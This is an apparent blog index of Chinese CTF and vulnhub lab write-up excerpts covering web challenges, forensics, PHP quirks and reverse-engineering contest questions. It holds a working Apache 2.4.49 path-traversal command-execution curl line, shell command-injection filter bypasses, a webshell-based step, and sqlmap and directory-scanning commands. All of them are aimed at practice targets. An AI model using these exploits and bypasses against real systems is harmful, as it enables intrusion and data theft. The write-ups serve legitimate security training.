青少年CTF Web 合集
Web签到备份文件index.php.bak
POST&GET12get传:gat=0port传:post=1
吃豆人查看index.js游戏分数大于1000的时候输出flag
base64解码
帝国CMS01www.zip
e/shell.php
直接执行命令拿flag
登陆后台https://zhuanlan.zhihu.com/p/431281857
Apache HTTP Server 2.4.49 路径穿越漏洞
123任意命令执行curl -X POST -d "echo;cat /flag" http://d022e5d8-dd45-45c8-91e6-8669be057be4.challenge.qsnctf.com:8081//cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
骑士CMS01https://blog.csdn.net/m0_63253040/article/details/127041028
骑士CMS01 74cms v4.2.111 后台getshell漏洞复现
先进入网站 ...
vulnhub靶机 DC-2
靶机介绍靶机介绍:https : //download.vulnhub.com/dc/DC-2.zip
信息搜集
获取IP地址
1234扫描靶机的IP的方法1. nmap -sP 192.168.142.0/24 #nmap进行ping扫描发现存活主机2. arp-scan -l #基于ARP发现内网存活主机3. netdiscover -r 192.168.142.0/24 -i eth0
12345参考文章:nmap思维导图:https://mp.weixin.qq.com/s/42dNv-q7K_XcJ7cv23LNSAarp-scan:https://blog.csdn.net/qq_41453285/article/details/100942591 https://www.kali.org/tools/arp-scan/netdiscover:https://blog.csdn.net/u010698107/article/details/115288643
扫描靶机开放端口
12使用nmap扫 ...
vulnhub靶机 HACKADEMIC:RTB1
靶机介绍官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/需要读取靶机的root目录下key.txt运行环境:虚拟机网络设置的是NAT模式靶机:IP地址:192.168.233.131攻击机:kali linux,IP地址:192.168.233.129
信息收集获取靶机IP地址
进入靶机
用wappalyzer查看用到技术
查看开放的端口
扫敏感目录
123nikto -h http://192.168.233.131dirb http://192.168.233.131/Hackademic_RTB1/gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html -u http://192.168.233.131
漏洞利用web端寻找漏洞,php页面,f12代码注入,sql注入
sqlmap注入
1sqlmap -u http://192.168.243.128/Hackadem ...
青少年CTF训练平台 Forensics SSH01-04
SSH-01隐藏的文件.flag.txt
SSH-02配置了ssh和apt查看配置文件
第一个flag在 /etc/apt/sources.list第二个flag/etc/ssh/sshd_config
1qsnctf{781dc104-1fc2-4de5-9b6e-c457ef64f799}
SSH-03提示flag是某个用户的用户名查看/etc/passwd文件
SSH-04提示黑客带着flag访问了服务器查看日志文件 /vat/log/nginx/access.log
青少年CTF训练平台 Web POST&GET
题目链接:青少年CTF训练平台页面提示需要以GET传参的方式传一个名称为get值为0的变量提示POST方式提交一个名称为post值为1的变量构造payload,得到flag
12get传参:gat=0port传参:post=1
青少年CTF训练平台 Web PingMe02
题目链接:青少年CTF训练平台提示传入参数ip加入管道符可以正常执行命令过滤了空格可以使用一下几种符号绕过
12345< -- 重定向,如cat<flag.php<> -- 重定向,如cat<>flag.php%09 -- 需要php环境,如cat%09flag.php${IFS} -- 单纯cat$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名,如cat${IFS2}flag.php$IFS$9 -- 后面加个$与{}类似,起截断作用,$9是当前系统shell进程第九个参数持有者,始终为空字符串,如cat$IFS2$9flag.php
cat被过滤 可以使用tac more head tail等命令绕过
123456789101112131415161718192021222324252627282930313233343536373839查看文本内容查看全部文本内容:1、cat命令cat file_n ...
青少年CTF训练平台 Web 登陆试试
题目链接:青少年CTF平台个人微信公众号:网络安全学习爱好者根据题目提示:得到用户名是 Syclover 密码前三位是 774burp抓包发现密码被MD5加密构造payload开始攻击->根据返回长度得到密码是 d7d81423804c8bca99a8cdc6abb50cf1解码得到密码是774931使用用户名:Syclover 密码:774931登录成功得到flag
青少年CTF-B2-PHP特性练习01-04
PHP特性01payload:
1?username[]=admi&password[]=admin
qsnctf{ca5f80d8-085c-4a8d-b474-a74bd1a4aada}
PHP特性02payload:
1?value=%0c1
qsnctf{c6c71221-f298-41ad-9da8-ca53b4a8b144}
12345//在php中:<?phpnum = %0c36;var_dump($num!=='36' and $num=='36');// ---> True?>
对于比较运算符号:如果两个操作数都是 数字字符串,或者一个操作数是数字而另一个是 数字字符串,则比较以数字方式进行。当比较是===或!==因为这涉及比较类型和值时,不会发生类型转换 ,因此此时类型和数值都要比对
所以:**==比较的是类型转换之后的数值 而 !==不仅要比较数值还要比较类型**
payload构造的时候只要 ...
第七届全国残疾人职业技能大赛样题-网络安全-CrackMe1
前言OllyDbg是一款Windows平台下的32位汇编语言调试器,具有反汇编、单步执行、断点调试、内存分析等功能。常用于软件逆向工程、漏洞分析等方面。
其具体功能包括:
反汇编和调试:对可执行文件进行反汇编并可以在其中设置断点,以方便调试和分析。
动态调试:可以动态地修改软件的内存和寄存器值,以修改软件的执行流程,达到对软件的修改目的。
插件支持:OllyDbg支持插件,可以扩展其功能。
内存查看:可以查看软件运行时的内存状态,并可以修改和搜索内存中的值。
寄存器查看:可以查看和修改CPU寄存器的状态。
可视化调试:可以使用多窗口界面,更加方便地查看程序执行状态和内存状态。
基本使用方法如下:
打开OllyDbg软件,并将需要调试的程序拖进软件中。
在OllyDbg中设置断点,并运行程序。
当程序执行到断点处时,会自动暂停。
可以查看程序运行时的内存状态、寄存器状态等。
可以修改内存值、寄存器值等,以修改程序的执行流程。
通过单步执行等方式,逐步调试程序,直至达到预期效果为止。
OllyDbg是一个基于反汇编的调试器,它可以将二进制代码反汇编为汇编代 ...
第七届全国残疾人职业技能大赛样题-网络安全-baby
前言1.dnspy介绍dnSpy是一款反编译工具,主要功能是将.NET程序集反编译到可读的C#源代码。其具体作用和功能包括:
反编译:可以将.NET程序集反编译到C#源代码,并且支持对反编译结果进行编辑和保存。
调试:可以进行程序集的调试,包括断点设置、单步调试等。
修改程序集:可以修改程序集,包括修改程序集中的IL代码,添加、删除、修改类、方法和属性等。
反混淆:可以反混淆.NET程序集,还原被混淆的代码。
查看元数据:可以查看程序集的元数据,包括类、方法、字段、属性等信息。
反射调用:可以使用反射调用程序集中的方法和属性。
dnSpy是.NET程序集反编译中非常实用的工具,尤其在逆向工程和恶意代码分析方面具有重要的作用。
2.脱壳和查壳脱壳是指将已加密或加壳的软件程序还原为未加密或未加壳的状态的过程。加壳是指为了保护软件不被破解或篡改而对软件进行加密或加壳。一般来说,脱壳是指将软件自身加壳去除,而不是破解其内部的加密算法。
脱壳常用的软件包括:
AspackDie:用于脱掉Aspack加壳的工具;
PEiD:用于识别PE文件的加壳形式和加密算法;
OllyDbg ...
第七届全国残疾人职业技能大赛样题-网络安全-犀利的调试器和逆向破解
前言OllyDbg是一款Windows平台下的32位汇编语言调试器,具有反汇编、单步执行、断点调试、内存分析等功能。常用于软件逆向工程、漏洞分析等方面。
其具体功能包括:
反汇编和调试:对可执行文件进行反汇编并可以在其中设置断点,以方便调试和分析。
动态调试:可以动态地修改软件的内存和寄存器值,以修改软件的执行流程,达到对软件的修改目的。
插件支持:OllyDbg支持插件,可以扩展其功能。
内存查看:可以查看软件运行时的内存状态,并可以修改和搜索内存中的值。
寄存器查看:可以查看和修改CPU寄存器的状态。
可视化调试:可以使用多窗口界面,更加方便地查看程序执行状态和内存状态。
基本使用方法如下:
打开OllyDbg软件,并将需要调试的程序拖进软件中。
在OllyDbg中设置断点,并运行程序。
当程序执行到断点处时,会自动暂停。
可以查看程序运行时的内存状态、寄存器状态等。
可以修改内存值、寄存器值等,以修改程序的执行流程。
通过单步执行等方式,逐步调试程序,直至达到预期效果为止。
OllyDbg是一个基于反汇编的调试器,它可以将二进制代码反汇编为汇编代 ...
第七届全国残疾人职业技能大赛样题-网络安全-真真假假分不清
前言ZIP伪加密是一种文件压缩加密方式,它并不真正加密压缩包内的文件,而是通过添加一个简单密码来欺骗用户,使得压缩包看起来像是被加密过的。这种方式的安全性很低,可以很容易地被破解。
要判断一个ZIP文件是否采用了伪加密,可以通过以下步骤:
尝试打开这个压缩包,如果能够无需密码就打开并查看其中的文件,则很可能是伪加密。
如果需要密码才能打开压缩包,但是输入错误的密码后仍然可以查看其中的文件,则也很可能是伪加密。
如果文件大小与实际内容不符合,或者存在其他异常现象,也有可能是伪加密。
我们已经知道ZIP文件格式中存在两个加密标志位,前面的加密标志位为数据区的加密标志位,后面的加密标志位为目录区的加密标志位。所谓伪加密就是修改目录区的加密标志位,使本来没有加密的ZIP文件,在解压的时候,需要用户输入密码来进行解压,但是这个密码又是不存在的。
1、无加密数据格式
2、伪加密数据格式
3、真加密数据格式
一、真真假假分不清1.打开题目
2.解题打开题目是个zip包,发现解压需要密码,用winhex打开文件
发现是伪加密,修改0108为0008,再次解压
得到flag:011938 ...